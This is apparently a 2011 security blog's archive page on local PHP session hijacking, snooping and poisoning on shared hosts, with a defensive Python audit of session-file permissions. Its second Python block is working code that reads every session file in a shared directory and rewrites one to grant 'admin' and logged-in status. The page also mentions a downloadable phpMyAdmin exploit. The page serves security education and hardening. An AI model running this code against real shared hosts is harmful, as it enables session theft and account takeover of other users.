Thursday, September 29, 2011
By default Suhosin transparently encrypts session files stored by PHP. This seems to be adequate protection against local session poisoning in a shared hosting environment. But let's take a closer look.
Thursday, September 15, 2011
Local Session Poisoning in PHP Part 2: Promiscuous Session Files
FastCGI, suPHP and suExec can all ensure that a PHP script which is called from the web will execute under the user that owns it, as opposed to the user the web server is running as. This seemingly protects against session poisoning by ensuring that a malicious user no longer can open and manipulate session files owned by other users in a shared host.
The hidden pitfall is that while these mechanisms protect session files from unauthorized access, they cannot prevent a user from authorizing others to access their own session files. If all session files are stored in a common folder, it is trivial to trick a web application into loading session variables from such a promiscuous session file.
Labels: local, php, php sessions, POC, session poisoning
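A hosting admin who cannot stop tenants from sharing their own session files can at least notice when it happens. The following Python audit is an added example, not code from the original post: it walks a shared session save_path and flags every `sess_<id>` file that is readable or writable by users other than its owner, which is exactly the "promiscuous" file the post describes. It assumes PHP's default files handler naming (`sess_<id>`); the fixture directory, file names and modes in `demo()` are constructed.

```python
import os
import shutil
import stat
import tempfile


def audit_session_dir(save_path):
    """Flag every sess_* file in a shared save_path that users other than its owner can read
    or write. Returns (findings, owner uids seen). suPHP/FastCGI only enforce ownership;
    a tenant who chmods their own session file is giving the access away deliberately."""
    findings, owners = [], set()
    for name in sorted(os.listdir(save_path)):
        if not name.startswith("sess_"):
            continue
        st = os.stat(os.path.join(save_path, name))
        owners.add(st.st_uid)
        perms = stat.S_IMODE(st.st_mode)
        problems = []
        if perms & (stat.S_IRGRP | stat.S_IROTH):
            problems.append("readable by others")
        if perms & (stat.S_IWGRP | stat.S_IWOTH):
            problems.append("writable by others")
        if problems:
            findings.append({"file": name, "uid": st.st_uid, "mode": oct(perms), "problems": problems})
    return findings, owners


def demo():
    """Constructed fixture: session files with PHP's default private mode and with the
    modes a tenant might set to make their own file promiscuous."""
    save_path = tempfile.mkdtemp(prefix="sess-audit-")
    fixtures = {
        "sess_a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6": 0o600,   # PHP default: owner only
        "sess_0f1e2d3c4b5a69788796a5b4c3d2e1f0": 0o644,   # readable by every local user
        "sess_1234567890abcdef1234567890abcdef": 0o666,   # readable and writable by all
        "unrelated.tmp": 0o666,                            # not a session file, ignored
    }
    try:
        for name, mode in fixtures.items():
            path = os.path.join(save_path, name)
            with open(path, "wb") as fh:
                fh.write(b'user|s:5:"guest";')             # constructed session content
            os.chmod(path, mode)
        findings, owners = audit_session_dir(save_path)
    finally:
        shutil.rmtree(save_path)
    return findings
```

The owner set returned alongside the findings is the other thing worth looking at: more than one uid in the same save_path means the tenants share a session directory, and the post's point is that in that situation a chmod by one of them is all it takes. The audit detects the condition; the fix the post implies is to stop sharing the directory at all, with a separate session.save_path per user.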
Wednesday, September 7, 2011
Local Session Poisoning in PHP Part 1: The Basics of Exploitation and How to Secure a Server
Session poisoning is the act of manipulating session-specific data in PHP: adding, changing or removing variables stored in the superglobal $_SESSION array.
Local session poisoning is possible because one web application can set a variable in the $_SESSION array while another web application that shares the same session store has no way of knowing how that variable's value came to be, and will interpret it according to its own logic. The $_SESSION array can thus be manipulated to contain the values needed to spoof a logged-in user or to exploit a vulnerable function. PHP programmers put far more trust in $_SESSION variables than in, for example, $_GET variables: the $_SESSION array is considered an internal variable, and an internal variable would never contain malicious input, would it?
Wednesday, August 10, 2011
Local Session Snooping in PHP
Local session snooping is not so much a security issue as a way of gathering information from an already compromised web application, unless it is a badly configured shared host, where an attacker might gather otherwise unobtainable information. It is basically about extracting all the information a web application has stored in the superglobal $_SESSION array.
Nevertheless, it is easy. The one thing needed is a session id (the value of the PHPSESSID cookie), and if the host uses PHP's default session handler these can easily be enumerated, as in the POC further down in this post.
Thursday, August 4, 2011
Local Session Hijacking in PHP
Recently I discovered that the shared hosting provider I sometimes use is susceptible to this age-old technique that everyone really should know about by now.
PHP's default session handler stores session data in files, and by default these files are placed in /tmp. In a shared environment, session files should never be placed in a directory that a malicious local user can read, such as the world-readable /tmp directory.
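The three posts above (Part 1 on poisoning, session snooping, and session hijacking) all come down to the same mechanics: a local user who can open a `sess_<id>` file in the shared save_path can read everything the application put in $_SESSION and can rewrite it. The Python below is an added example for all three, not the blog's own POC code. It implements a parser and serializer for the format PHP's default "php" session serializer writes (`name|<serialize()-value>` entries back to back; scalars, null and nested arrays, not objects), then uses them to snoop every session in a directory and to poison one. The save_path, session id and session contents in `SAMPLE` and `demo()` are constructed.

```python
import os
import shutil
import tempfile

# Constructed sample of what PHP's default "php" serializer writes to sess_<id> for
# $_SESSION = ['user' => 'guest', 'logged_in' => false, 'roles' => ['user'], 'last_seen' => 1315000000]
SAMPLE = b'user|s:5:"guest";logged_in|b:0;roles|a:1:{i:0;s:4:"user";}last_seen|i:1315000000;'


def parse_value(buf, pos):
    """Decode one PHP serialize() value at buf[pos]; return (value, position after it)."""
    t = buf[pos:pos + 1]
    if t == b"N":                                    # N;
        return None, pos + 2
    if t in (b"i", b"b", b"d"):                      # i:42;  b:1;  d:1.5;
        end = buf.index(b";", pos)
        raw = buf[pos + 2:end]
        value = int(raw) if t == b"i" else (raw == b"1" if t == b"b" else float(raw))
        return value, end + 1
    if t == b"s":                                    # s:<byte length>:"<bytes>";
        colon = buf.index(b":", pos + 2)
        length, start = int(buf[pos + 2:colon]), colon + 2
        if buf[start + length:start + length + 2] != b'";':
            raise ValueError("bad string terminator at %d" % (start + length))
        return buf[start:start + length].decode("utf-8", "surrogateescape"), start + length + 2
    if t == b"a":                                    # a:<count>:{<key><value>...}
        colon = buf.index(b":", pos + 2)
        count, p, items = int(buf[pos + 2:colon]), colon + 2, {}
        for _ in range(count):
            key, p = parse_value(buf, p)
            items[key], p = parse_value(buf, p)
        if buf[p:p + 1] != b"}":
            raise ValueError("bad array terminator at %d" % p)
        return items, p + 1
    raise ValueError("unsupported type %r at %d" % (t, pos))   # objects (O:) are not handled here


def parse_session(data):
    """Split a sess_<id> file into {name: value}. Entries are name|<value> back to back;
    splitting on '|' would break on strings that contain one, so walk the values instead."""
    session, pos = {}, 0
    while pos < len(data):
        bar = data.index(b"|", pos)
        session[data[pos:bar].decode("ascii")], pos = parse_value(data, bar + 1)
    return session


def dump_value(value):
    """Inverse of parse_value: the bytes PHP's serialize() would produce."""
    if value is None:
        return b"N;"
    if isinstance(value, bool):                      # before int: bool subclasses int
        return b"b:1;" if value else b"b:0;"
    if isinstance(value, int):
        return b"i:%d;" % value
    if isinstance(value, float):
        return ("d:%r;" % value).encode("ascii")
    if isinstance(value, str):
        raw = value.encode("utf-8", "surrogateescape")
        return b's:%d:"%s";' % (len(raw), raw)
    if isinstance(value, (list, tuple)):
        value = dict(enumerate(value))
    body = b"".join(dump_value(k) + dump_value(v) for k, v in value.items())
    return b"a:%d:{%s}" % (len(value), body)


def dump_session(session):
    return b"".join(name.encode("ascii") + b"|" + dump_value(v) for name, v in session.items())


def snoop(save_path):
    """Session snooping: read every sess_* file a local user can open in save_path."""
    found = {}
    for name in sorted(os.listdir(save_path)):
        if name.startswith("sess_"):
            with open(os.path.join(save_path, name), "rb") as fh:
                found[name[len("sess_"):]] = parse_session(fh.read())
    return found


def poison(save_path, session_id, **changes):
    """Session poisoning: rewrite chosen $_SESSION variables of an existing session."""
    path = os.path.join(save_path, "sess_" + session_id)
    with open(path, "rb") as fh:
        session = parse_session(fh.read())
    session.update(changes)
    with open(path, "wb") as fh:
        fh.write(dump_session(session))
    return session


def demo():
    """Constructed fixture: one session file in a temporary stand-in for /tmp."""
    save_path = tempfile.mkdtemp(prefix="sess-demo-")
    sid = "b7c1e9f2d0a4c6e8f1a2b3c4d5e6f7a8"           # constructed session id
    path = os.path.join(save_path, "sess_" + sid)
    try:
        with open(path, "wb") as fh:
            fh.write(SAMPLE)
        before = snoop(save_path)[sid]                # what snooping reveals
        after = poison(save_path, sid, user="admin", logged_in=True, roles=["admin"])
        with open(path, "rb") as fh:
            written = fh.read()                       # what the application will load next request
    finally:
        shutil.rmtree(save_path)
    return before, after, written
```

The point of doing a real parse rather than a string replace is the string length prefix: `s:5:"guest"` becomes `s:5:"admin"` only because both are five bytes, and a hand-edited file with a wrong length is silently discarded by PHP's unserializer, so the poisoned session never loads. Running `demo()` against a directory a local user can actually open, such as a shared /tmp, is the whole of the hijacking post: the file names are the session ids.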
Friday, July 29, 2011
Encrypt.se New Feature: Key exchange
Encrypt.se is a small tool that helps anyone send encrypted messages easily. There is no registration, no cookies, no hassle.
Read more about it in this previous post: http://ha.xxor.se/2011/07/encryptse-beta-open-for-public.html
The Key Exchange feature enables users of Encrypt.se to communicate their secret crypto key to their friends over the phone, even if someone might be listening.
Saturday, July 9, 2011
phpMyAdmin 3.x Swekey RCI Exploit
Someone else submitted a working Python exploit to exploit-db. It's already out there, so I might as well publish my original exploit, written in PHP.
2011-07-20 - Fixed some bugs in the exploit.
Download here